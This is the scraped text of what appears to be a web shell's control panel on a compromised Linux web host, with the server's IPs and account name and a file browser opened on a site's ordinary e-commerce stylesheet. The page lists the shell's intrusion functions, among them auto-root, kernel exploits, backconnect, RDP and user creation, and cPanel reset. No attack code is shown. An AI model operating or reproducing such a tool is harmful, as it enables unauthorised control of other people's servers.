Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.116.81.110
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Accel /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
comnon.css
24.24
KB
-rw-r--r--
daterangepicker.css
8.07
KB
-rw-r--r--
ecommerce.css
7.11
KB
-rw-r--r--
index.css
6.75
KB
-rw-r--r--
jquery.fancybox-3.5.7.min.css
12.5
KB
-rw-r--r--
main-style.css
0
B
-rw-r--r--
single-product.css
1.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ecommerce.css
/* empty cart */ .empty-cart { height: 50vh; width: 100%; } .width-540 { max-width: 540px; margin: auto; width: 100%; } .empty-cart .title-h4 { text-transform: capitalize; font-weight: 400; } .empty-cart .comm-btn { display: block; padding: 9px 22px; text-transform: capitalize; font: 500 18px / 21px "Inter"; } /* empty cart end */ /* input coupon */ .input-coupon { width: 68%; } .input-coupon input { width: 100%; border: 1px solid #dee2e7; border-top-left-radius: 6px; border-bottom-left-radius: 6px; outline: none; padding: 10px; border-right: none; font: normal 15px / 18px "Inter"; } .apply-btn-input { font: normal 15px / 18px "Inter"; border: 1px solid #dee2e7; background: transparent; font-weight: 500; outline: none; padding: 10px 17px; border-top-right-radius: 4px; border-bottom-right-radius: 4px; color: var(--blue); } .comm-btnx { box-shadow: 0px 1px 2px 0px #38383814; font: 500 18px / 22px "Inter"; padding: 15px 20px; } /* input coupon end */ /* cart list */ .cart-img { background: #eeeeee; border-radius: 6px; padding: 12px; flex: 0 0 14%; max-height: 80px; margin-right: 1rem; } .cart-info-v1 { flex: 0 0 82%; } .call-qty { flex: 0 0 15%; } .cart-more-items { flex: 0 0 67%; } .qty-sl { justify-content: space-between; box-shadow: 0px 1px 2px 0px #38383814; border: 1px solid #DEE2E7; border-radius: 6px; padding: 11px; } .dm-qty { width: 65%; } .dm-qty select { border: 0; cursor: pointer; appearance: none; width: 100%; } .icon-select-dp { position: absolute; top: 0px; right: 0; } .cart-info-v1 { gap: 7px; } .call-addmove .comm-btn { font: 500 13px / 15px "Inter"; padding: 0.41rem 0.6rem; } .remove-btn { color: #C10000; margin-right: 0.5rem; } .cart-items li:last-child .divider { display: none; } .make-cart { gap: 1.65%; } .items-collect { flex: 0 0 74.60%; } .make-earn { flex: 0 0 23.75%; } .dm-pd { padding: 17px 18px 20px; } /* cart list end */ .help-ul { max-width: 838px; width: 100%; gap: 5%; } .help-li { flex: 0 0 30%; } .img-cl { display: flex; align-items: center; justify-content: center; width: 48px; height: 48px; margin-right: 7px; background-color: #DEE2E7; border-radius: 50%; } .help-li { display: flex; } .text-v1 h2 { color: #1C1C1C; } .cart-reco-pd { gap: 1.1%; } .cart-reco-pd .products-a { align-items: unset; } .cart-reco-pd .item-title h2 { padding: 0; } .cart-reco-pd .item-img { padding: 23px; } .cart-reco-pd .sell-btn { display: flex; padding: 0.5rem 0.90rem; align-items: center; gap: 5px; } /* filter section */ .search-wrap { margin: 1.5rem 0 3.5rem; } .all-products { gap: 1.5%; } .filter-wrap { flex: 0 0 20.5%; } .filter-products { flex: 0 0 78%; } .items-li .title-h6 { line-height: 36px; font-weight: 400; display: block; } .items-li:last-child .title-h6 { color: var(--blue); } .filter-heading { border-top: 1px solid #DEE2E7; padding: 14px 0; cursor: pointer; } .move-aw { position: absolute; right: 3px; top: 14px; transition: transform ease-in-out .3s, -webkit-transform ease-in-out .3s; } .filter-heading.arrow-down .move-aw { -webkit-transform: rotate(180deg); transform: rotate(180deg); } .items-li [type=checkbox] { padding: 0; height: initial; width: initial; margin-bottom: 0; display: none; cursor: pointer; } .items-li .radio-input, .items-li .chexbox-lb { position: relative; cursor: pointer; line-height: 36px; font-weight: 400; display: block; } .items-li .chexbox-lb:before { content: ''; -webkit-appearance: none; background-color: transparent; border: 2px solid #BDBDBD; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.05), inset 0px -15px 10px -12px rgba(0, 0, 0, 0.05); padding: 8px; display: inline-block; position: relative; vertical-align: middle; cursor: pointer; margin-right: 15px; border-radius: 5px; } .items-li [type=checkbox]:checked+.chexbox-lb:after { content: ''; display: block; position: absolute; top: 11px; left: 8px; width: 6px; height: 14px; border: solid var(--blue); border-width: 0 2px 2px 0; transform: rotate(45deg); } .items-li input[type=radio] { position: absolute; opacity: 0; } .items-li .radio-input { display: flex; width: 100%; } .items-li input[type=radio]+.radio-input:before { content: ""; background: transparent; border-radius: 100%; border: 2px solid #979797; display: inline-block; width: 20px; height: 20px; position: relative; top: 8px; margin-right: 15px; cursor: pointer; text-align: center; transition: all 250ms ease; } .items-li input[type=radio]:checked+.radio-input:before { background-color: var(--blue); border: 2px solid var(--blue); box-shadow: inset 0 0 0 2px var(--white); } .items-li input[type=radio]:focus+.radio-input:before { outline: none; border-color: var(--blue); } /* filter section end */ .search-listname { padding: 18px; } .listing-pd { padding: 20px 18px; gap: 1rem; } .item-imgv1 { flex: 0 0 23%; } .rating-count { color: #FF9017; } .shipingv1 { color: #00B517; } .list-of-products { gap: 15px; } .all-ams { gap: 5px; line-height: 16px; } .c-ol { width: 6px; height: 6px; border-radius: 50%; display: block; background: #DEE2E7; } .listing-pd a.title-h6 { color: var(--blue); font-weight: 500; display: inline-block; } .list-pagi { gap: 10px; } .pagi-select { border: 1px solid #DEE2E7; border-radius: 6px; padding: 8px 45px 8px 10px; } .pagi-select .icon-select-dp { position: absolute; top: 7px; right: 7px; } .pagi-select select { border: 0; cursor: pointer; appearance: none; width: 100%; } /* pagi */ .pagination a { color: var(--black); font: 500 16px / 19px "Inter"; text-decoration: none; transition: background-color .3s; border: 1px solid #DEE2E7; align-items: center; display: flex; justify-content: center; width: 44px; height: 40px; } .pagination a:first-child { border-top-left-radius: 6px; border-bottom-left-radius: 6px; } .pagination a:last-child { border-top-right-radius: 4px; border-bottom-right-radius: 4px; } .pagination a.active { background-color: #EFF2F4; color: #8B96A5; } /* .pagination a:hover:not(.active) { background-color: #ddd; } */ /* pagi */
Close